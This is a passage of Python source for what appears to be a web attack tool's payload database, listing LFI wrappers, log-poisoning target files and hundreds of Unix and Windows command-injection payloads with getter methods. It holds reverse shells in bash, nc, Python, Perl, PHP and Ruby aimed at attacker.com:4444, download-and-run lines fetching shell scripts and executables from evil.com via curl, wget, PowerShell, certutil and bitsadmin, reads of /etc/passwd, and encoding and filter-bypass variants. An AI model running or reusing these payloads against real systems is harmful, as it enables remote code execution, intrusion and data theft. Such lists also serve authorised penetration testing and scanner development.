                    'compress.bzip2://',
                    'zip://',
                    'rar://',
                    'ogg://',
                    'glob://'
                ],
                'log_poisoning_targets': [
                    '/var/log/apache2/access.log',
                    '/var/log/apache2/error.log',
                    '/var/log/httpd/access_log',
                    '/var/log/httpd/error_log',
                    '/var/log/nginx/access.log',
                    '/var/log/nginx/error.log',
                    '/var/log/sshd.log',
                    '/var/log/auth.log',
                    '/var/log/mail.log',
                    '/var/log/vsftpd.log',
                    '/var/log/proftpd/proftpd.log',
                    '/proc/self/environ',
                    '/proc/self/fd/0',
                    '/proc/self/fd/1',
                    '/proc/self/fd/2',
                    '/proc/self/fd/3',
                    '/proc/self/fd/4',
                    '/proc/self/fd/5',
                    '/proc/self/fd/6',
                    '/proc/self/fd/7',
                    '/proc/self/fd/8',
                    '/proc/self/fd/9'
                ]
            },
            
            'command_injection_massive_db': {
                'unix_payloads': [
                    '; whoami',
                    '| whoami',
                    '& whoami',
                    '&& whoami',
                    '|| whoami',
                    '`whoami`',
                    '$(whoami)',
                    '; id',
                    '| id',
                    '& id',
                    '&& id',
                    '|| id',
                    '`id`',
                    '$(id)',
                    '; uname -a',
                    '| uname -a',
                    '&& uname -a',
                    '`uname -a`',
                    '$(uname -a)',
                    '; cat /etc/passwd',
                    '| cat /etc/passwd',
                    '&& cat /etc/passwd',
                    '`cat /etc/passwd`',
                    '$(cat /etc/passwd)',
                    '; ls -la',
                    '| ls -la',
                    '&& ls -la',
                    '`ls -la`',
                    '$(ls -la)',
                    '; pwd',
                    '| pwd',
                    '&& pwd',
                    '`pwd`',
                    '$(pwd)',
                    '; ps aux',
                    '| ps aux',
                    '&& ps aux',
                    '`ps aux`',
                    '$(ps aux)',
                    '; netstat -an',
                    '| netstat -an',
                    '&& netstat -an',
                    '`netstat -an`',
                    '$(netstat -an)',
                    '; env',
                    '| env',
                    '&& env',
                    '`env`',
                    '$(env)',
                    '; w',
                    '| w',
                    '&& w',
                    '`w`',
                    '$(w)',
                    '; which nc',
                    '| which nc',
                    '&& which nc',
                    '`which nc`',
                    '$(which nc)',
                    '; which wget',
                    '| which wget',
                    '&& which wget',
                    '`which wget`',
                    '$(which wget)',
                    '; which curl',
                    '| which curl',
                    '&& which curl',
                    '`which curl`',
                    '$(which curl)',
                    
                    # Reverse shells
                    '; nc -e /bin/sh attacker.com 4444',
                    '| nc -e /bin/sh attacker.com 4444',
                    '&& nc -e /bin/sh attacker.com 4444',
                    '; bash -i >& /dev/tcp/attacker.com/4444 0>&1',
                    '| bash -i >& /dev/tcp/attacker.com/4444 0>&1',
                    '&& bash -i >& /dev/tcp/attacker.com/4444 0>&1',
                    '; python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'attacker.com\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"',
                    '; perl -e \'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'',
                    '; php -r \'$sock=fsockopen("attacker.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");\'',
                    '; ruby -rsocket -e\'f=TCPSocket.open("attacker.com",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\'',
                    
                    # Encoded payloads
                    '; `echo d2hvYW1p | base64 -d`',  # whoami
                    '; $(echo d2hvYW1p | base64 -d)',
                    '; `echo \x77\x68\x6f\x61\x6d\x69`',
                    '; $(echo \x77\x68\x6f\x61\x6d\x69)',
                    '; `printf "\x77\x68\x6f\x61\x6d\x69"`',
                    '; $(printf "\x77\x68\x6f\x61\x6d\x69")',
                    
                    # Filter bypasses
                    ';w$@ho$@am$@i',
                    ';who$IFS$9ami',
                    ';w`<`ho`<`am`<`i',
                    ';who${IFS}ami',
                    ';who$IFS$1ami',
                    ';who$IFS$2ami',
                    ';who$IFS$3ami',
                    ';who$IFS$4ami',
                    ';who$IFS$5ami',
                    ';who$IFS$6ami',
                    ';who$IFS$7ami',
                    ';who$IFS$8ami',
                    ';who$IFS$9ami',
                    ';{who,ami}',
                    ';{w,hoami}',
                    ';{wh,oami}',
                    ';{who,a,mi}',
                    ';who"a"mi',
                    ";who'a'mi",
                    ';who\\ami',
                    ';wh\\oami',
                    ';w\\hoami',
                    ';/bin/cat$IFS/etc/passwd',
                    ';/bin/cat${IFS}/etc/passwd',
                    ';cat$IFS$9/etc$IFS$9/passwd',
                    ';cat</etc/passwd',
                    ';cat<>/etc/passwd',
                    
                    # Time delays
                    '; sleep 10',
                    '| sleep 10',
                    '&& sleep 10',
                    '`sleep 10`',
                    '$(sleep 10)',
                    '; ping -c 10 127.0.0.1',
                    '| ping -c 10 127.0.0.1',
                    '&& ping -c 10 127.0.0.1',
                    '`ping -c 10 127.0.0.1`',
                    '$(ping -c 10 127.0.0.1)',
                    
                    # File operations
                    '; echo "test" > /tmp/test',
                    '| echo "test" > /tmp/test',
                    '&& echo "test" > /tmp/test',
                    '; touch /tmp/test',
                    '| touch /tmp/test',
                    '&& touch /tmp/test',
                    '; rm /tmp/test',
                    '| rm /tmp/test',
                    '&& rm /tmp/test',
                    '; ls /tmp/',
                    '| ls /tmp/',
                    '&& ls /tmp/',
                    
                    # Network operations
                    '; wget http://evil.com/shell.sh -O /tmp/shell.sh',
                    '| wget http://evil.com/shell.sh -O /tmp/shell.sh',
                    '&& wget http://evil.com/shell.sh -O /tmp/shell.sh',
                    '; curl http://evil.com/shell.sh -o /tmp/shell.sh',
                    '| curl http://evil.com/shell.sh -o /tmp/shell.sh',
                    '&& curl http://evil.com/shell.sh -o /tmp/shell.sh',
                    '; wget http://evil.com/shell.sh | sh',
                    '| wget http://evil.com/shell.sh | sh',
                    '&& wget http://evil.com/shell.sh | sh',
                    '; curl http://evil.com/shell.sh | sh',
                    '| curl http://evil.com/shell.sh | sh',
                    '&& curl http://evil.com/shell.sh | sh'
                ],
                'windows_payloads': [
                    '& whoami',
                    '&& whoami',
                    '|| whoami',
                    '| whoami',
                    '; whoami',
                    '& dir',
                    '&& dir',
                    '|| dir',
                    '| dir',
                    '; dir',
                    '& dir C:\\',
                    '&& dir C:\\',
                    '|| dir C:\\',
                    '| dir C:\\',
                    '; dir C:\\',
                    '& type C:\\windows\\system32\\drivers\\etc\\hosts',
                    '&& type C:\\windows\\system32\\drivers\\etc\\hosts',
                    '|| type C:\\windows\\system32\\drivers\\etc\\hosts',
                    '| type C:\\windows\\system32\\drivers\\etc\\hosts',
                    '; type C:\\windows\\system32\\drivers\\etc\\hosts',
                    '& net user',
                    '&& net user',
                    '|| net user',
                    '| net user',
                    '; net user',
                    '& net localgroup administrators',
                    '&& net localgroup administrators',
                    '|| net localgroup administrators',
                    '| net localgroup administrators',
                    '; net localgroup administrators',
                    '& systeminfo',
                    '&& systeminfo',
                    '|| systeminfo',
                    '| systeminfo',
                    '; systeminfo',
                    '& ipconfig /all',
                    '&& ipconfig /all',
                    '|| ipconfig /all',
                    '| ipconfig /all',
                    '; ipconfig /all',
                    '& tasklist',
                    '&& tasklist',
                    '|| tasklist',
                    '| tasklist',
                    '; tasklist',
                    '& netstat -an',
                    '&& netstat -an',
                    '|| netstat -an',
                    '| netstat -an',
                    '; netstat -an',
                    '& set',
                    '&& set',
                    '|| set',
                    '| set',
                    '; set',
                    
                    # Windows reverse shells
                    '& powershell -c "IEX(New-Object Net.WebClient).downloadString(\'http://evil.com/shell.ps1\')"',
                    '&& powershell -c "IEX(New-Object Net.WebClient).downloadString(\'http://evil.com/shell.ps1\')"',
                    '& powershell -ExecutionPolicy Bypass -Command "& {Start-Process cmd -ArgumentList \'/c calc\' -NoNewWindow}"',
                    '&& powershell -ExecutionPolicy Bypass -Command "& {Start-Process cmd -ArgumentList \'/c calc\' -NoNewWindow}"',
                    '& cmd /c "powershell -Command \\"& {(New-Object System.Net.WebClient).DownloadFile(\'http://evil.com/nc.exe\',\'C:\\\\temp\\\\nc.exe\'); C:\\\\temp\\\\nc.exe -e cmd.exe evil.com 4444}\\""',
                    
                    # Encoded Windows payloads
                    '& cmd /c echo d2hvYW1p | powershell -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content -Raw)))"',
                    '&& cmd /c echo d2hvYW1p | powershell -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content -Raw)))"',
                    
                    # Filter bypasses Windows
                    '&who^ami',
                    '&&who^ami',
                    '&w""ho""ami',
                    '&&w""ho""ami',
                    "&w'ho'ami",
                    "&&w'ho'ami",
                    '&wh%COMSPEC:~-1,1%oami',
                    '&&wh%COMSPEC:~-1,1%oami',
                    '&set "var=whoami" && %var%',
                    '&&set "var=whoami" && %var%',
                    
                    # Time delays Windows
                    '& timeout 10',
                    '&& timeout 10',
                    '& ping -n 10 127.0.0.1',
                    '&& ping -n 10 127.0.0.1',
                    '& waitfor /T 10 test',
                    '&& waitfor /T 10 test',
                    
                    # File operations Windows
                    '& echo test > C:\\temp\\test.txt',
                    '&& echo test > C:\\temp\\test.txt',
                    '& type C:\\temp\\test.txt',
                    '&& type C:\\temp\\test.txt',
                    '& del C:\\temp\\test.txt',
                    '&& del C:\\temp\\test.txt',
                    '& dir C:\\temp\\',
                    '&& dir C:\\temp\\',
                    
                    # Network operations Windows
                    '& powershell -c "Invoke-WebRequest -Uri http://evil.com/shell.ps1 -OutFile C:\\temp\\shell.ps1"',
                    '&& powershell -c "Invoke-WebRequest -Uri http://evil.com/shell.ps1 -OutFile C:\\temp\\shell.ps1"',
                    '& certutil -urlcache -split -f http://evil.com/shell.exe C:\\temp\\shell.exe',
                    '&& certutil -urlcache -split -f http://evil.com/shell.exe C:\\temp\\shell.exe',
                    '& bitsadmin /transfer job http://evil.com/shell.exe C:\\temp\\shell.exe',
                    '&& bitsadmin /transfer job http://evil.com/shell.exe C:\\temp\\shell.exe'
                ]
            }
        }
    
    def get_sql_patterns(self):
        return self.knowledge_base['sql_injection_massive_db']
    
    def get_xss_patterns(self):
        return self.knowledge_base['xss_massive_db']
    
    def get_lfi_patterns(self):
        return self.knowledge_base['lfi_rfi_massive_db']
    
    def get_command_injection_patterns(self):
        return self.knowledge_base['command_injection_massive_db']
    
    def get_all_patterns(self):
        return self.knowledge_base